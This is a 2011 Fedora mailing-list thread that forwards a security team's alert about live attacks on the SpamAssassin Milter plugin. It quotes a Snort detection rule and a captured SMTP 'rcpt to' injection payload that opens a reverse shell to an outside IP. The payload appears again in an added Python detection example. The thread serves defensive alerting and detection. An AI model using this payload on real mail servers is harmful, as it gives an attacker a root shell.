Old 02-10-2011, 08:06 PM
jdow
 
Default No need for AV tools on Linux, eh?

For all of you with your touching faith that Linux is invulnerable I
offer up this message from the Spam Assassin list. This is an exploit
into a piece of software running with root privileges - in your email
system.

{^_-}

-------- Original Message --------
Subject: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt
Date: Thu, 10 Feb 2011 12:42:40 -0500
From: Michael Scheidell



heads up:

in case you are using spamassassin milter:

active exploits going on.

<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt











The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|"|7C|";

Personally, I would probably block it. Although, if we’re not seeing this
sort of thing pop up on customer’s boxes, a manual block in scanner2 is
sufficient for now, right?

Either way, let me know and I’ll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt

is the snort rule specific enough that you can block the offending ip for 5
mins?

(if it's a real smtp server, it will retry) and legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don’t like the looks of this. I blocked that IP with samtool.

Payload:

rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"

data

.

quit

--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-alert@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin
Remote Arbitrary Command Injection Attempt

02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
Arbitrary Command Injection Attempt
[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
>*| *SECNAP Network Security Corporation

·Certified SNORT Integrator

·2008-9 Hot Company Award Winner, World Executive Alliance

·Five-Star Partner Program 2009, VARBusiness

·Best in Email Security,2010: Network Products Guide

·King of Spam Filters, SC Magazine 2008



--
users mailing list
users@lists.fedoraproject.org
To unsubscribe or change subscription options:
https://admin.fedoraproject.org/mailman/listinfo/users
Guidelines: http://fedoraproject.org/wiki/Mailing_list_guidelines
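
Added example, not part of the original thread or of any Snort/Emerging Threats code: a small Python emulation of the two content matches quoted above, run over a constructed SMTP session to show how specific they are. It assumes one SMTP command per payload; the `rcpt_has_pipe` check, the function names and the sample session (with the documentation address 192.0.2.1) are assumptions made for illustration.

```python
import re

# Content matches quoted in the thread (Snort hex escapes: 3A is ':', 7C is '|').
FIRST = b"to:"       # content:"to|3A|"; depth:10; nocase;
SECOND = b'+:"|'     # second content, no modifiers
DEPTH = 10

def rule_matches(payload: bytes) -> bool:
    # depth:10 limits the first match to the first 10 bytes; nocase folds case.
    if FIRST not in payload[:DEPTH].lower():
        return False
    # The second content is case-sensitive and may sit anywhere in the payload.
    return SECOND in payload

# Assumption (not from the thread): a stricter per-command check that parses
# the RCPT TO argument and flags any pipe character in it.
RCPT_RE = re.compile(rb"^\s*rcpt\s+to:\s*(.*)$", re.IGNORECASE)

def rcpt_has_pipe(line: bytes) -> bool:
    m = RCPT_RE.match(line.rstrip(b"\r\n"))
    return bool(m) and b"|" in m.group(1)

def scan_session(lines):
    # Returns (line_number, reasons) for every client line that trips a check.
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = []
        if rule_matches(line):
            reasons.append("rule-content")
        if rcpt_has_pipe(line):
            reasons.append("pipe-in-rcpt")
        if reasons:
            hits.append((n, reasons))
    return hits

# Constructed sample session; line 4 has the shape of the payload in the alert.
SAMPLE = [
    b"HELO mail.example.net\r\n",
    b"MAIL FROM:<bob@example.net>\r\n",
    b"RCPT TO:<alice+lists@example.com>\r\n",
    b'rcpt to: root+:"|exec /bin/sh 0</dev/tcp/192.0.2.1/45295 1>&0 2>&0"\r\n',
    b"DATA\r\n",
    b"To: alice+lists@example.com\r\n",
    b".\r\n",
]

if __name__ == "__main__":
    print(scan_session(SAMPLE))
```

Ordinary plus-addressed recipients and a `To:` header line pass both checks; only the recipient carrying the quoted pipe sequence is flagged.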
 
Old 02-10-2011, 08:18 PM
Michael Cronenworth
 
Default No need for AV tools on Linux, eh?

jdow wrote:
> For all of you with your touching faith that Linux is invulnerable I
> offer up this message from the Spam Assassin list. This is an exploit
> into a piece of software running with root privileges - in your email
> system.

I tried real hard to perform this exploit on my postfix/spamassassin F14
server, but the exploit did not work.

Try again.
 
Old 02-10-2011, 08:30 PM
Joe Zeff
 
Default No need for AV tools on Linux, eh?

On 02/10/2011 01:06 PM, jdow wrote:
> For all of you with your touching faith that Linux is invulnerable I
> offer up this message from the Spam Assassin list. This is an exploit
> into a piece of software running with root privileges - in your email
> system.

Is this a "proof of concept," or is it actually in the wild? I also
note that it isn't listed as affecting Fedora 14.
 
